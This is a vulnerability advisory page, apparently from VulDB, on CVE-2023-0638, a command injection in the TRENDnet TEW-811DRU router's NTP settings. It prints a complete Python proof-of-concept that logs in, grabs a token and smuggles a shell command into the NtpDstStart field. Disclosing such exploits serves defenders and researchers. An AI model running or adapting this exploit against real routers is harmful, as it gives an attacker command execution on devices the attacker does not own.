| CVSS Meta Temp Score | Current Exploit Price (≈) | CTI Interest Score |
|---|---|---|
| 6.5 | $0-$5k | 0.03 |
A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects an unknown functionality of the component Web Interface. The manipulation with an unknown input leads to a command injection vulnerability. The CWE definition for the vulnerability is CWE-77. The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. As an impact it is known to affect confidentiality, integrity, and availability.
The weakness was presented 02/02/2023. This vulnerability was named CVE-2023-0638. Technical details are unknown but a public exploit is available. This vulnerability is assigned to T1202 by the MITRE ATT&CK project.
A public exploit has been developed in Python. It is possible to download the exploit at vuldb.com. It is declared as proof-of-concept. The code used by the exploit is:
import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '555',
'Origin': 'http://0.0.0.0:8081',
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/adm/time.asp',
'Cookie': 'expandable=5c',
'Upgrade-Insecure-Requests': '1'},
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
'DSTenable': 'on',
'NtpDstEnable': 1,
'NtpDstOffset': -7200,
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
'tz_daylight_start_day_select': 1,
'tz_daylight_start_time_select': 2,
'NtpDstEnd': 100102,
'tz_daylight_end_month_select': 384968387,
'tz_daylight_end_day_select': 1,
'tz_daylight_end_time_select': 2,
'enableNTP': 1,
'ntp_server': 1,
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11',
'timer_interval': 16776915,
'manual_year_select': 2012,
'manual_month_select': 'abcd',
'manual_day_select': 'abcd',
'manual_min_select': -38,
'manual_sec_select': "abcd",
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../',
'DNSServerGuest': ''},
'ATTR':
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
login_header = {'Host': '0.0.0.0:8081',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referer': 'http://0.0.0.0:8081/login.asp',
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
try:
loop -= 1
r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
if r.status_code != 200:
continue
r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
pat = r'name="token" value="(.*?)"'
token_value = re.findall(pat,r.text)
if len(token_value)>0:
params['token'] = token_value[0]
print('new_token:{}'.format(token_value[0]))
break
except Exception as e:
time.sleep((3-loop)*3)
print('error:{}'.format(e))
try:
r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
passThere is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.
Product
Vendor
Name
License
- commercial
CPE 2.3
CPE 2.2
CVSSv3
VulDB Meta Base Score: 7.2VulDB Meta Temp Score: 6.5
VulDB Base Score: 7.2
VulDB Temp Score: 6.5
VulDB Vector: 🔒
VulDB Reliability: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vector | Complexity | Authentication | Confidentiality | Integrity | Availability |
|---|---|---|---|---|---|
| unlock | unlock | unlock | unlock | unlock | unlock |
| unlock | unlock | unlock | unlock | unlock | unlock |
| unlock | unlock | unlock | unlock | unlock | unlock |
VulDB Base Score: 🔒
VulDB Temp Score: 🔒
VulDB Reliability: 🔍
Exploiting
Class: Command injectionCWE: CWE-77 / CWE-74 / CWE-707
ATT&CK: T1202
Local: No
Remote: Yes
Availability: 🔒
Access: Public
Status: Proof-of-Concept
Programming Language: 🔒
Download: 🔒
EPSS Score: 🔒
EPSS Percentile: 🔒
Price Prediction: 🔍
Current Price Estimation: 🔒
| 0-Day | unlock | unlock | unlock | unlock |
|---|---|---|---|---|
| Today | unlock | unlock | unlock | unlock |
Threat Intelligence
Interest: 🔍Active Actors: 🔍
Active APT Groups: 🔍
Countermeasures
Recommended: no mitigation knownStatus: 🔍
0-Day Time: 🔒
Timeline
02/02/2023 Advisory disclosed02/02/2023 CVE reserved
02/02/2023 VulDB entry created
03/01/2023 VulDB last update
Sources
Advisory: vuldb.comStatus: Not defined
CVE: CVE-2023-0638 (🔒)
scip Labs: https://www.scip.ch/en/?labs.20161013
Entry
Created: 02/02/2023 09:09 AMUpdated: 03/01/2023 04:39 PM
Changes: 02/02/2023 09:09 AM (38), 02/02/2023 09:10 AM (2), 03/01/2023 04:39 PM (3)
Complete: 🔍
Submitter: leetsun
No comments yet. Languages: en.
Please log in to comment.